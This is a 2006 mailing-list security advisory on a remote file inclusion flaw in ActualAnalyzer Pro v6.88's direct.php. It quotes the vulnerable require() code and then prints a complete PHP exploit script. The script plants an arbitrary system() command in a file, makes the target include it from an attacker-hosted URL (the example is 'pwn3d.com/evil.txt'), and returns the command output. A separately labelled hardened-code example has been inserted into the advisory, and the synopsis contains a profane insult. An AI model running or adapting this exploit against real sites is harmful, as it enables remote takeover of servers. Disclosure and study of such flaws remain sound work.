Message-ID: <445F6311.7080801@gmail.com>
Date: Mon May  8 16:26:16 2006
From: wr0ck.lists at gmail.com (wr0ck)
Subject: [XPA] ActualAnalyzer Pro v6.88 - Remote Command Execution Vulnerability

=======================================================================================
XOR Crew :: Security Advisory 
       4/10/2006
=======================================================================================
ActualAnalyzer Pro v6.88 - Remote Command Execution Vulnerability
=======================================================================================
http://www.xorcrew.net/
http://www.xorcrew.net/ReZEN
=======================================================================================

:: Summary

       Vendor       :  ActualScripts
       Vendor Site  :  http://www.actualscripts.com/
       Product(s)   :  ActualAnalyzer Pro v6.88
       Version(s)   :  All
       Severity     :  Medium/High
       Impact       :  Remote Command Execution
       Release Date :  4/10/2006
       Credits      :  ReZEN (rezen (a) xorcrew (.) net)

=======================================================================================

I. Description

Pro Edition: the professional solution for medium and large business web sites.
The ability to collect highly detailed statistics about each separate page of a
web site will help you effectively manage the overall Internet strategy and
direction of the company, and successfully optimize and develop it.

=======================================================================================

II. Synopsis

FUCK YOU 'ASHTETICO' 0hday releasing wh0re.

There is a remote file inclusion vulnerability that allows for remote command
execution in the /direct.php file. The bug is here on lines 5-8:

if(!isset($rf)) $rf='./';

require $rf.'common/error.php';
require $rf.'common/global.php';
require $rf.'common/config.php';
require $rf.'common/dbaccess.php';

The $rf variable is only given a default when it is unset; a value supplied in the
request (direct.php?rf=...) is used unvalidated as the path prefix in the require()
statements. The vendor and support team have been contacted.
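For comparison, an added example (not the vendor's code and not part of the advisory) of a hardened form of the same include prologue: the include base is anchored to the script's own directory and a request-supplied value is never used directly as a path prefix. The allowed sub-directory list and the four files under common/ are assumptions for illustration.

```php
<?php
// Added example: hardened include prologue for direct.php (not vendor code).
// The vulnerable original only defaulted $rf when it was unset, so a value
// supplied in the request became the require() prefix (remote file inclusion).

// 1. Never derive the include base from request data; anchor it to this file.
$base = realpath(__DIR__);

// 2. If a configurable sub-directory is genuinely needed, allowlist it and
//    verify the resolved path stays under $base. realpath() resolves '..'
//    and returns false for URL wrappers such as http:// or php://.
$allowed = ['', 'admin'];                       // hypothetical allowed values
$sub = isset($_GET['rf']) ? (string) $_GET['rf'] : '';

if (!in_array($sub, $allowed, true)) {
    http_response_code(400);
    exit('invalid include path');
}

$dir = realpath($base . DIRECTORY_SEPARATOR . $sub);
if ($dir === false
    || strpos($dir . DIRECTORY_SEPARATOR, $base . DIRECTORY_SEPARATOR) !== 0) {
    http_response_code(400);
    exit('invalid include path');
}
$rf = $dir . '/';

// 3. Only now perform the includes; $rf cannot point outside the application
//    tree. Defence in depth: set allow_url_include=Off (and allow_url_fopen=Off
//    where not needed) in php.ini so require() cannot fetch remote code at all.
require $rf . 'common/error.php';
require $rf . 'common/global.php';
require $rf . 'common/config.php';
require $rf . 'common/dbaccess.php';
```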

=======================================================================================

Exploit code:

-----BEGIN-----

<?php
/*
ActualAnalyzer Remote File Inclusion Exploit c0ded by ReZEN
Sh0uts: xorcrew.net, ajax, gml, #subterrain, D2K
url:  http://www.xorcrew.net/ReZEN

example:
turl: http://www.target.com/path to actualanalyzer/direct.php?rf=
hurl: http://www.pwn3d.com/evil.txt?

*/

$cmd = $_POST["cmd"];
$turl = $_POST["turl"];
$hurl = $_POST["hurl"];

$form= "<form method=\"post\" action=\"".$PHP_SELF."\">"
     ."turl:<br><input type=\"text\" name=\"turl\" size=\"90\" value=\"".$turl."\"><br>"
     ."hurl:<br><input type=\"text\" name=\"hurl\" size=\"90\" value=\"".$hurl."\"><br>"
     ."cmd:<br><input type=\"text\" name=\"cmd\" size=\"90\" value=\"".$cmd."\"><br>"
     ."<input type=\"submit\" value=\"Submit\" name=\"submit\">"
     ."</form><HR WIDTH=\"650\" ALIGN=\"LEFT\">";

if (!isset($_POST['submit']))
{

echo $form;

}else{

$file = fopen ("test.txt", "w+");

fwrite($file, "<?php system(\"echo ++BEGIN++\"); system(\"".$cmd."\"); system(\"echo ++END++\"); ?>");
fclose($file);

$file = fopen ($turl.$hurl, "r");
if (!$file) {
     echo "<p>Unable to get output.\n";
     exit;
}

echo $form;

$line = '';
while (!feof ($file)) {
     $line .= fgets ($file, 1024)."<br>";
}
$tpos1 = strpos($line, "++BEGIN++");
$tpos2 = strpos($line, "++END++");
$tpos1 = $tpos1+strlen("++BEGIN++");
$tpos2 = $tpos2-$tpos1;
$output = substr($line, $tpos1, $tpos2);
echo $output;

}
?>


------END------

=======================================================================================

IV. Greets :>

All of xor, Infinity, stokhli, ajax, gml, D2K

=======================================================================================
